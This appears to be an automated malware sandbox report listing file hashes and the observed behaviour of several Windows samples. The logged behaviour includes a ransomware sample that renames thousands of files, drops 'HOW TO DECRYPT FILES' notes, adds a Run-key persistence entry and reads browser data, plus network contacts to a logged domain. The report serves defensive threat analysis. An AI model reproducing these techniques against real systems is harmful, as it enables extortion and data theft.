SHA512 2e9a1ebb32c2f9bf2f673085181aa288c27c9fff22f4437082ff978e5b855cdd06e63d07253cc5e7568ac9fa2531fb401265294d00986f33e5b7296326755352

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk

MD5 1aca0497707a207899dd7804984ce7ee
SHA1 46459d1c10cb6ebbadcac503b575d3574a43d3f9
SHA256 dda265ae389433e5113a1e07b1993f698372e9e8ddb9b02237c47994354b7ed0
SHA512 fbaf4c3f78ce13da90113d46af7485e37cf050b09d9770abe11ee41685e10553dd8930e64f5d10a225445a3b92084fbb994e72dc974284a26cccb3ab7e48b9b5

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\alert_lrg.gif

MD5 fc18677ca4043b0d8a93d01d39063887
SHA1 3bbe3183e7c766be774f40c61f42ec19880cef4f
SHA256 e27925ab98cb485a948fdcca19a5916815874769b5af5d3d254b7085c9581835
SHA512 73a4a24ffe48796d3db3ac761770fd81af89492bfd6e10e3b7a19838f9ae8f9da7c45902a350e8d83c55d8dad441a398a61b9b361785f37f0cbe896fe619c0bd

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\ASPdotNET_logo.jpg

MD5 5f66b98035345c741845d4df520ebee6
SHA1 c73371a35aefc26303b7a7e7be729714a5f5d1e9
SHA256 23476dc0cd1f84e63d058d48011f5a38cf490600f188cf030609780e28c75c65
SHA512 8c224f8cd32a0befc6bca9e8ac1b84dd13956998c1b188c70739c8a4eb326a51d3ace66fc508722978cbd59eb8631a23dc5a11c06328e576762c8c110fa784d5

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\aspx_file.gif

MD5 b95280dc2d0f115eea4d02e5b67c3ed3
SHA1 bcf7fcaacb4ea2dbaf5f20f425fc2c58e0964d59
SHA256 382f29a58f6673297b2578cbd4aec4b7b6f225af83f74faaf5983334a651f97d
SHA512 ed98534e020ff950e56fb9074b8145a158d180fc9b46c1bd3ab27981ebfb8d5a84e805602c7cf409f963c9851421c88ea4277a07310b429ec0b7f360bc4008d6

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\branding_Full2.gif

MD5 a084499c4b14d106dc6ae542a55148e0
SHA1 817f92e0ad9704a62385b2737829fb86c2e123f0
SHA256 7ced6b3f05d22fb22e7a2c96df13d9e1f7d2297961a55dcd49205f43aef2f17e
SHA512 b5e42547152eb17e3dd60a10d04bcb8bbd9bcd96c9c02baf741aaba29b8990d7e0f0fa7738c7294cd0d19ccaacde66adf3ed1cc8ad74ee6c9930a01183e25e88

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\darkBlue_GRAD.jpg

MD5 0305f3935eb97f0e28576793fed2a454
SHA1 b6f32c3487aaa7bdd975fffdd7c97963c28b3e44
SHA256 0bc62c17bbf1aee86137cd8d36804b3f2985240c91fcdae942f1a51dae696f95
SHA512 b63c28fbca595ccaf7ba1a0462624970c214742ba60892c9c64674d6c6728398ef92a480a2d7e41b6fdaf9138574247caea959c006fe71e4a7466429d4b80a29

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\deselectedTab_1x1.gif

MD5 b40036cff7a236be3c05c4ced98134fb
SHA1 d7156ce9dbe28ef15470d0ae556d9bb1c8706fcc
SHA256 ff193e5888d94c897d36f0132433d46619a75c2d8b652b8cac61dc1919aceda6
SHA512 f22b2956d7093b5e61eee47f75a27f52fc0f0963ad8786e24dae878969684aa6d15d5a39d042c2960b2a41f28c3581e57f043e43d926476cccb9136599b0f46b

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\folder.gif

MD5 537383f503195b2885e38cea448ed5f7
SHA1 73bad596c39249e5aceab4cc66ddf5c7e116858b
SHA256 28ca666cbdea89bd23c1262dfb262f6b171a462c50b4b6a2864a34a9f6124f29
SHA512 8f39e25c5df04854a73f9c3625ecd06a17a3ec1c83a905a91af7d9ec3be20e61febaf1243f59b67d98bb32af4a9bf0186ed9788e4ee12cf8f2405dcb82775fbd

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onBlue.gif

MD5 757b8dd52893816d18acd53747bfb0bc
SHA1 bac3e7b9b85b233e713b8dfbc5c3ad45c6d99d2c
SHA256 ef562177487f2e8375c153bda7afd567272aa3892b8db33ad6da1f1ec581eb6b
SHA512 874700a1a4f8fc5a88209a9778bc2e0594742db9d88638b72228f75c01f6aad723568b3e59da8175253052d2cb9534a0f94689e02758598bb94c943fc3011a33

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onWhite.gif

MD5 7d79542dbeafaa523f55e565365e65d2
SHA1 448c53227bd2a68744801f4861dac88d58be27b3
SHA256 f87964bb48f948ed7fc49858a39a17ae0c7a8b55b0a4cc0037ec6f6b4d5ea335
SHA512 f0203bb57c1c36852b7ceb90c28310de4448a004b1ed784d37ab05f7e18886ece077886b50c6f7c2f250c0196df8cea92c3e84e577bc43bb494b121d2ba25795

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\headerGRADIENT_Tall.gif

MD5 8961e7d295079a3da8de9c5aa4a819ba
SHA1 934731afc0065c164ab45335f216790b0ab119b0
SHA256 c5240b6a850c5116fc7806e010930a63fa28f629ca363868dcad746dcc3c10ed
SHA512 562b630c5d6df67711413001b6824a7a4bf8205a8b4e0562f249bbe02ca3eb170a9c75e4fd74cf1ab129d8942329a38b142f605d9f7a54fb7b07b3961068eb74

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\help.jpg

MD5 4bd333d90abaa611759c63702460a97e
SHA1 1bc0aa55c84b4cec249011659d1dd378e8827224
SHA256 09a860d631b024dff2ee0286417757f888a21115221c1c7fa8b31cf22b0449e3
SHA512 40968cc945139f23e587c8b7990f036d3f61e385bd2eab1d8580ec4125ff30d2889dd5e45b8ad5df9c567e778b8d8d34e6b78d66dbf6b8050cbd9922bf08c439

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\HelpIcon_solid.gif

MD5 88c97f9ae243554565e8def5cab285c8
SHA1 d30a0eabb88af9ff4cd3554072675965b094304b
SHA256 f675696fdc11ddc4a99fc45c82b70665def2cd9eb47feca3372ea36679d3253c
SHA512 d5a0bc47578f6d5df36654f33d3df293e52f1c6312583a273ff1746176a4507ba5cb4e0e7c237ab19ae2d0d8215c47907e2763422d42e52b35b1b9a52eef474a

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\image1.gif

MD5 65ad39bf7b613ed2991b768c5a53a6bb
SHA1 f74e404612b32cef39de33727652708873d825ef
SHA256 7bff5df8f5c5e87bc4e4a9cee04de9d14c3e9e23b0f60563f2352a38c39b01ed
SHA512 18f22e62d8c7fe432aac8e26609c125ce5eba94889c8cf581311dccd7caa2f73d35f6825b39c05f16e131fd771d645eb79c06f4c279a4f0f51231567abf46ff3

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\image2.gif

MD5 642a4f7bda16af066f503a5f102088dd
SHA1 e1536dfdfe9d1e6ed495d04ecdd3e9d1ba4dabc5
SHA256 478ae124c83ab5d9dcef2f90606e7f5614f1a72ac3509221ee456d6b38e47465
SHA512 078b0be1ee69cbcf320200640d8c66f2776e6065a866789ca7610f577df49748487ae0edd695820cddc22b8c79ef50fa57ef4f2fd4d4320e770716a2e2b8c880

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\requiredBang.gif

MD5 c0a36b230311e53a684d35670a60d347
SHA1 3aef9426ceb9e6d32110a87e1a34382df520da4d
SHA256 b882c41e9a17264effae0a81103677a351248c3d9c9687b8f33b832428caaafb
SHA512 cf3124b8e9a6e5f75a861522e47d56e21b07007e1819a8874938e0a6f2503478eae00cfb512d5a13977ba6136c61b5fcf00bb099751d130162d8a23a6b235be2

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_leftCorner.gif

MD5 e14c7cadfd93f3f1c3aeca220474adfd
SHA1 1d043b314289718d395f86016f5a56898b95b7b3
SHA256 854a3d06095ceb965d0fd3c2b275e4b84cedc05f93c3abedcbbcf2afcf0c1348
SHA512 a7633878c664da07c7bef1293e4ebfd185a1f4acdecf5ebc49b0a3ab103da16980427e17026920a5c3435c6793e02a32f358e99df14fb45ded2d0ca3edb5043d

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_rightCorner.gif

MD5 26b44f78f18fc0b219e29871667efde5
SHA1 74746f735cfaa9c2b9e217821dc61a5ec0000433
SHA256 2f40ad49d115567740919bfe99eb0e179d68ee53628b3aabcce265c355cffe53
SHA512 83eea8ab21a74333dbb2a5871ebcc45f4acaf21c3a1bb4ab3c5d5cc8888ba52fa08a131a123e3091e72160dff7ea51f3e66b76362ae268658123f20bff4eed3a

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\topGradRepeat.jpg

MD5 ebf4afc630984bee8d56d68a63ca540b
SHA1 f415d41514c38f3bb1581c43f3ff5bc275870590
SHA256 b1eaf5fc907db4aee35549cac6866755cd51610a463abec89b4c62d2d781f760
SHA512 f63a802ce39e4a25e1cff9de9212cd546df38c5d9f35ed69cc9025175c782546c3f0ccf4b8506a3d8e400f7e9f6a6a3990d7f6ae10d4b9a72ee862790b31d6f7

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\unSelectedTab_leftCorner.gif

MD5 69212e15dc2754acfb98f4fa6939a194
SHA1 4c4cac7d83176f40c2cee3dad96a41e7d306fdd8
SHA256 3528ecd2134a99c8ed567453257ea29504f1b96744546c339f622abf855b8074
SHA512 b4900e2c21dba35f5f4d3eeb5deaea4b2e7256b6cf84f2ebd34cc7fec19499dfe64f69002ebf970b7103d591aeec469be22d7970934892dcaf936c63618a640a

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\unSelectedTab_rightCorner.gif

MD5 feb5b28daa7551890e6a6397b7e93bde
SHA1 a7b20c3fb24cd64ecca2a4a1f43f4bcb184e8abf
SHA256 39772bc872af06c80efd8cc80a0023a02fa2a8532a9bd392b503501550e44918
SHA512 f35366347505f6fc856e61d2457ae63da08444ad0fc6f8d6ee0f21acca80f0abbf8d88147d18d6ed6138aa69cb7d001e7076fde0457a99b372d06a27cb2b654e

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\yellowCORNER.gif

MD5 3d8afe0e5ee0a2e3eca1f1ba36736578
SHA1 a2189ca542eef367336ef3fe6637c093f7f64a2d
SHA256 92d74e36a166d280fc2df176b0cbe38cac3346f84324df00922aa099d26d126f
SHA512 94db04e298ef1e796f793d2ee30dcd6baef04b4ec5a540ed2a23c5ca83c6f7ddf794f5aaf6d55a943de3d21e55bb3ff84e6bbaacda994cd14150c85f056088ad

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20241010-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Upx.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Upx.exe

"C:\Users\Admin\AppData\Local\Temp\Upx.exe"

Network

N/A

Files

memory/1600-0-0x0000000000400000-0x000000000057E000-memory.dmp

memory/1600-2-0x0000000000400000-0x000000000057E000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe

"C:\Users\Admin\AppData\Local\Temp\screenshot2016.exe"

C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe

"C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gltsapi.coetech.com udp
US 199.59.243.227:80 gltsapi.coetech.com tcp

Files

memory/2868-0-0x000007FEF56D3000-0x000007FEF56D4000-memory.dmp

memory/2868-1-0x0000000000B30000-0x0000000000FCE000-memory.dmp

memory/2868-2-0x00000000004F0000-0x000000000053C000-memory.dmp

memory/2868-4-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CaptureItPlus.exe

MD5 e8cc55a833bfd86a6d3c4ad8391050cb
SHA1 dee0d797b0ccf1cd6c47b6c9fa9f157ccf3e4c62
SHA256 24b6c0f724c496aefab3e6a58b194213dc4ca4016e50ce8428b4fe15c6b6b240
SHA512 9c0639a3efaefd2a0c3dbc2ead4f1314290ac4506997f8026a62be0f641c79509201198bab7bd0496f19875b8571c6fd519520e0b0b4d673ef0121156178fca3

memory/2088-9-0x0000000000340000-0x00000000003AC000-memory.dmp

memory/2088-10-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp

memory/2088-11-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp

memory/2868-12-0x000007FEF56D3000-0x000007FEF56D4000-memory.dmp

memory/2868-13-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp

memory/2088-14-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240729-en

Max time kernel

120s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\uacbypass.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\uacbypass.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\uacbypass.exe

"C:\Users\Admin\AppData\Local\Temp\uacbypass.exe"

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

120s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gltsapi.coetech.com udp
US 199.59.243.227:80 gltsapi.coetech.com tcp

Files

memory/816-0-0x000007FEF4E13000-0x000007FEF4E14000-memory.dmp

memory/816-1-0x00000000013D0000-0x000000000143E000-memory.dmp

memory/816-2-0x000007FEF4E10000-0x000007FEF57FC000-memory.dmp

memory/816-3-0x000007FEF4E13000-0x000007FEF4E14000-memory.dmp

memory/816-4-0x000007FEF4E10000-0x000007FEF57FC000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240708-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr" /S

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr

"C:\Users\Admin\AppData\Local\Temp\Supplementary Agreement 26_01_2016.scr" /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 128

Network

N/A

Files

memory/2096-0-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2096-1-0x0000000000400000-0x0000000000410000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20241023-en

Max time kernel

246s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe"

Signatures

Renames multiple (2207) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\it-IT\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\drivers\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\drivers\de-DE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\drivers\es-ES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\drivers\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\drivers\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Alcmeter = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8i9eHkHOwWwQlX.exe" C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\Starter\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnrc004.inf_amd64_neutral_bbd3435eeaf576ee\Amd64\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wvmbushid.inf_amd64_neutral_6708ad28050a6765\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\HomePremium\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\InstallShield\setupdir\0c0c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_functions_advanced.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\blbdrive.inf_amd64_neutral_1aa816fe7dc98c3f\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mcx2.inf_amd64_neutral_8cf9cade8f7bba56\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\HomePremiumE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\eval\Ultimate\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_scopes.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmgl004.inf_amd64_neutral_1874f16002601f78\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnlx00b.inf_amd64_neutral_89b555703683b583\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wudfusbcciddriver.inf_amd64_neutral_adc3e4acb1046b4b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\default.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_remote_output.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\brmfcumd.inf_amd64_neutral_db43b26810939b3e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hpoa1so.inf_amd64_neutral_4f1a3f1015001339\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\en-US\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\HomeBasic\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmmhzel.inf_amd64_neutral_1292ec506cfc26db\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\net8187se64.inf_amd64_neutral_c239ab5d36a3b3e9\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_For.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FZG8CKJ5\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\_Default\HomePremiumN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-TextServicesFramework-Migration-DL\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_History.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_providers.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hdaudss.inf_amd64_neutral_330a593eb888237c\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmsonyu.inf_amd64_neutral_45152a8a9362fb82\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_remote_FAQ.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_WS-Management_Cmdlets.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_locations.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Ref.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\eval\ProfessionalN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\HomeBasicN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Comment_Based_Help.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\cdrom.inf_amd64_neutral_0b3d0d1942ab684b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netg664.inf_amd64_neutral_b4e8ccc6ba210e97\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnkm003.inf_amd64_neutral_48652cda3bb15180\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\Ultimate\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Automatic_Variables.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\lsi_sas.inf_amd64_neutral_a4d6780f72cbd5b4\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnbr00a.inf_amd64_neutral_e7f3f91e6832ef5c\Amd64\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_pssessions.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_jobs.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_objects.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_If.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnge001.inf_amd64_neutral_cfffa4143b3c4592\Amd64\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File created C:\Windows\SysWOW64\migwiz\PostMigRes\Web\base_images\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Path_Syntax.help.txt C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
